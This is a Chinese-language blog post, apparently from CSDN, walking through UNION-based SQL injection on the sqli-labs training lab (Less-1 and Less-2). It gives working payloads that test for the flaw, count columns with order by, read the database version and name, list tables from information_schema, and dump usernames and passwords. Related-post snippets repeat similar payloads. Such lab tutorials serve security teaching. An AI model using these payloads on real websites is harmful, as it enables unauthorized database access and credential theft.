SQL注之联合查询注入

最新推荐文章于 2024-06-15 20:21:51 发布
最新推荐文章于 2024-06-15 20:21:51 发布
阅读量419 收藏 10
点赞数 11
分类专栏: 网络安全 文章标签: sql 数据库 web安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shen213254149/article/details/139143196
版权

1.1使用条件

        页面对不同的查询语句有不同的回显结果

        根据每一步的返回结果判断和进行下一步操作

2.1基本流程

        判断是否具有sql注入条件
        判断sql注入漏洞是否存在及类型
        判断sql查询字段数
   

3.实例演示

3.1sql靶场less-1

        在此小编用sql靶场第一关跟第二关来演示SQL注之联合查询注入        

        进行sql注入,首先需要判断该网页是否具有sql注入的条件:是否为动态网页,前后端是否具有数据信息交互功能(黑盒测试)

        第一关提示输入id参数,但是该网页没有输入点,盲猜输入点在URL处

在该网页URL处输入

http://sqli-labs/Less-1/?id=1

该页面得到两个数据回复信息 知道了该网页是动态网页

3.2sql靶场less-2

判断时候具有sql注入的前提条件 是否有sql注入漏洞,sql的类型

在该页面url处输入?id=2,该页面回复数据,判断出有sql注入的条件

在该网页url处?id=2',页面回复信息错误,初步判断具有语法漏洞

在url处输入?id=2# ,页面回复信息错误

在url处输入?id=2 and 1=1 # 页面正常回复数据

在url处输入?id=2 and 1=2 # 页面无数据回复 判断此处有数字型sql注入漏洞

利用order by 二分法探索sql查询属性字段列数

该网页URL处输入?id=2 order by 5 #,页面回显错误信息

该网页URL处输入?id=2 order by 3 #,页面回显正确数据信息

在该网页URL处输入?id=2 order by 4 #,页面回显正确错误信息,由此可以判断出sql查询属性字段列数为3

         联合利用数据库内置函数:version()/database()探测数据库版本、数据库库名

        在该网页URL处输入?id=-2 union select 1,version(),database() #页面2、3位分别回显数据库版本信息、数据库名

联合利用inforation_schema库tables表探测security数据库表名
在该网页URL处输入?id=-2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=’seceurity’ #;可以看到页面第三位爆出securiy库中所有表名

在该网页URL处输入?id=-2 union select 1,group_concat(username),group_concat(password) from users #;页面2、3位爆出(username、password)关键敏感信息

我在读一年级
关注
  • 11
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入-联合查询注入
m0_53820621的博客
08-10 3494
SQL注入-联合查询注入
SQL注入联合查询注入
热门推荐
selecthch的博客
06-07 4万+
联合查询注入利用的前提前提条件:页面上有显示位什么是显示位?在一个在一个网站的正常页面,服务端执行SQL语句查询数据库中的数据,客户端将数 据展示在页面中,这个展示数据的位置就叫显示位联合注入的过程1、判断注入点2、判断是整型还是字符型3、判断查询列数4、判断显示位5、获取所有数据库名6、获取数据库(test)所有表名7、获取(数据库:test,表:admin)中所有字段名8、获取字段中的数据一、...
SQL注入-联合查询注入union
qq_57307348的博客
01-23 3455
目录 SQL注入的一库三表 union联合查询注入意事项 MySQL函数利用 1、常用函数 2、连接字符串函数 联合查询注入union 利用前提 联合注入的过程 1、先判断有没有注入点 3、判断有多少列 4、判断显示位 5、显示有哪些数据库 6、显示数据库中有哪些表 7、显示表中有哪些字段(以users为例) 8、获取字段 SQL注入的一库三表 information_schema 元数据数据库 (数据库名, 表名, 字段...
sql注入联合查询
笔墨稠思
07-07 999
本次注入采用DVWA作为靶场,数据库采取mysql 首先我们设置一下dvwa的安全等级 修改等级后点击submit按钮,之后我们进入sql注入的实战靶场 联合查询注入,我们需要用到 union 来连接两条sql语句 一.判断注入类型 他给了我们一个form表单,让我们提交一个user ID进去,这个注入点很明确,肯定是我们输入进去的id了,id一般都是int 类型的,但也有可能是字符串类型的 那数据库的查询语句可能是 select * from 表 where id = $user_id 也可能是
SQL注入联合查询、报错注入sqlmap
Loners_fan的博客
01-03 4058
SQL注入
SQL注入-联合查询
weixin_51706044的博客
02-05 1638
文章目录前言一、判断注入点还是整形或字符型二、判断列数三.找到显示位四.获取库名五.获取表名六.获取列名七.获取字段信息总结 前言 联合查询: 一:按照注入语法分为:联合查询注入Union/报错查询注入error/布尔型注入Boolean/延时注入Time/堆叠查询注入 二:联合查询注入是最简单的一种注入方式,但是要求页面必须有显示位.否则无法注入. 显示位:可以理解为从数据库提取的数据被显示在前端. 如果没有显示位,我们无法查看注入的结果. 三:联合查询一般步骤: 1、判断注入点还是整形或字符型 2、判
SQL联合注入
黑黑的小鸭的博客
08-09 2200
超详细介绍SQL联合注入,本文使用靶场为sqli-labs less-1;
SQL联合查询注入学习
2301_80034711的博客
03-10 849
SQL是操作数据库数据的结构化查询语句,网页的应用数据和后台数据库中的数据进行交互时会采用SQL。程序没有对用户输入数据的合法性进行验证和过滤,导致SQL查询语句被恶意拼接从而产生SQL注入。攻击者可以在事先定义好的查询语句的结尾上添加额外的SQL语句,从而对数据库服务器执行非授权的任意查询,获得相应的数据信息。4、分类:①GET注入注入点在URL中②POST注入注入点在POST提交的数据中③Head头注入注入点在请求头中①有回显注入(显错注入):执行语句后可以把具体内容反馈出来。
SQL注入(一)联合查询 报错注入
m0_63306943的博客
04-21 1767
是web网站的常见攻击技术,如果权限足够的话它可以通过sql注入的方式1.知道物理路径可以进行木马的上传2.可以进行udf的提权3.可以通过注入获取到数据库中的数据。sql注入产生的原因:在数据交互中,前端的数据传入到后台处理时,由于后端没有做严格的判断,导致其传入的“数据拼接到SQL语句中后,被当作SQL语句的一部分执行。
SQL注入基础整理及Tricks总结1
08-03
1. 联合查询 2. 报错 3. 布尔盲 4. 时间盲 3. 笛卡尔积
sql笔记.docx
12-30
联合注入 id=-1 ' union select 1,schema_name,3 from informaiton_schema.schemata --+ id=-1' union select 1,tbale_name,3 from information_schema.tables where table_name='security'--+ id=-1' union ...
reviewLearned:复习学过的知识,和做过的项目,用作应付面试
04-04
项目里面是项目的代码网址.md网址里面填着复习的网站简历.docx里是我简历为了通过字节跳动的安全岗面试,我决定练习先讲出来,然后再写出来,这是最后一次,没有下次。...联合注入使用联合选择联合查询进行
Flink Sql-用户自定义 Sources & Sinks
bigdatakenan的博客
06-13 893
在许多情况下,开发人员不需要从头开始创建新的连接器,而是希望稍微修改现有的连接器或 hook 到现有的 stack。在其他情况下,开发人员希望创建专门的连接器。本节对这两种用例都有帮助。它解释了表连接器的一般体系结构,从 API 中的纯粹声明到在集群上执行的运行时代码实心箭头展示了在转换过程中对象如何从一个阶段到下一个阶段转换为其他对象。
【AI+编程】工作日常场景随时可以AI编程,记一个问答SQL快速导出数据日常示例
最新发布
月晓风清
06-15 296
为了实现你需要的操作,即以问题名称作为表头,答案作为内容导出,你可以通过JOIN操作连接三个表,然后利用动态SQL语句进行行转列转换(PIVOT)。然后通过执行这个动态生成的SQL,你可以得到一个表格,表中的每一行表示一个成员,对应每个问题的答案作为列数据。然后,在动态生成的SQL语句中利用JOIN把db_member、db_question和db_answer连接起来,并根据question_id和member_id进行匹配,以输出每个成员对应的问题答案。下面是假定表结构,实际场景和它类似。
Python Flask 使用SQLAlchemy实现ORM管理
胖蔡叨叨叨
06-12 298
SQLAlchemy是python里提供的一款SQL工具,支持数据库连接、映射、对象关系映射(ORM)以及数据库操作等功能。SQLAlchemy在构建在WSGI规范上的下一代中得到了广泛应用。如下介绍如何在Flask项目中配合实现数据库管理。
SQL中distinct去重关键字的使用和count统计组合的使用
睡不醒的每天
06-13 446
distinct必须在列的前面,否则直接提示错误,当distinct作用于单列的的情况下,统计查询的结果为行数目的总数,包含null为空的数目。count(distinct 列名):根据指定的列统计记录总数,不包含重复的记录,不包括NULL或空的值。select distinct 列名1,列名2,列名3…select distinct 列名 from 表;也可以使用count(2)、count(3)等等。count(distinct 列名)
sql注入union联合查询
05-19
其中,union联合查询就是SQL注入中常用的一种方式。 在SQL语句中,union是用来连接两条或多条select语句的关键字,它可以将两个查询结果合并成一个结果集。攻击者可以通过在输入框中输入一些特殊的字符或者语句,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值